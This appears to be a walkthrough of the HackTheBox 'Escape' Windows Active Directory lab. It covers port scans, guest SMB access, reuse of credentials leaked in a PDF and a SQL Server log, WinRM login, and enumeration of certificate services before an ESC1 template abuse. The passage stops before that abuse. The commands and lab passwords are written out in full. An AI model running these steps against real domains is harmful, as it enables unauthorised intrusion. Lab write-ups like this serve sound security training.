Escape is a Medium difficulty Windows Active Directory machine that starts with an SMB share that guest authenticated users can download a sensitive PDF file. Inside the PDF file temporary credentials are available for accessing an MSSQL service running on the machine. An attacker is able to force the MSSQL service to authenticate to his machine and capture the hash. It turns out that the service is running under a user account and the hash is crackable. Having a valid set of credentials an attacker is able to get command execution on the machine using WinRM. Enumerating the machine, a log file reveals the credentials for the user ryan.cooper. Further enumeration of the machine, reveals that a Certificate Authority is present and one certificate template is vulnerable to the ESC1 attack, meaning that users who are legible to use this template can request certificates for any other user on the domain including Domain Administrators. Thus, by exploiting the ESC1 vulnerability, an attacker is able to obtain a valid certificate for the Administrator account and then use it to get the hash of the administrator user.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/udp-scan
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-03 17:36:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-03T17:33:04
|_Not valid after: 2054-11-03T17:33:04
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Summary
* Open ports: 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - KERBEROS- RPC - SMB - LDAP - LDAPS - MSSQL - winRM - NTP
* Important notes: DNS:dc.sequel.htb - Domain: sequel.htb - Microsoft SQL Server 2019
hosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo sh -c "echo '$ip dc dc.sequel.htb sequel.htb ' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $tail -n1 /etc/hosts
10.10.11.202 dc dc.sequel.htb sequel.htb
Kerberos Enumeration
I started my enumeration process by bruting kerberos since I need domain account to attack the box as no web server here but with no luck
I moved then to smb and rpc services looking for misconfiguration in shared folder permissions or rpc. I found I had READ access on the Public share and no access to RPC.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
result was NT_STATUS_ACCESS_DENIED
I connected to the share and download a pdf file from it
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $impacket-smbclient sequel.htb/guest:''@dc
# shares
ADMIN$
C$
IPC$
NETLOGON
Public
SYSVOL
# use Public
# ls
drw-rw-rw- 0 Sat Nov 19 06:51:25 2022 .
drw-rw-rw- 0 Sat Nov 19 06:51:25 2022 ..
-rw-rw-rw- 49551 Sat Nov 19 06:51:25 2022 SQL Server Procedures.pdf
# get SQL Server Procedures.pdf
After opening the file, I noticed there are credentials at the end of it.
Foothold
PublicUser:GuestUserCantWrite1
I can access the database with these creds :))
When I deal with mssql, I perform checklist for possible attack paths, So I will create one
Check for admin Access
Check the databases for juicy info and secrets
Check the possibility capture the mssql service account
Under C:\SQLServer\Logs, there is a .bak file containing logs info of MSSQL instance. What is interesting is that I find Ruan.Cooper trying to login and failed. Maybe I can use this string as a password NuclearMosquito3
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
..snip..
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
..snip..
And the password is correct :))
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3
LDAPS 10.10.11.202 636 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3
Privilege Escalation
I accessed the machine as Ryan and found he is a member of Certificate Service DCOM Access
I need to enumerate the PKI of the domain since this group exists. A CA is found in the domain with name of sequel-DC-CA
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3 -M adcs
LDAPS 10.10.11.202 636 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3
ADCS 10.10.11.202 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.202 389 DC Found PKI Enrollment Server: dc.sequel.htb
ADCS 10.10.11.202 389 DC Found CN: sequel-DC-CA
Then, I looked at vulnerable template for possible Escalation paths (ESC)
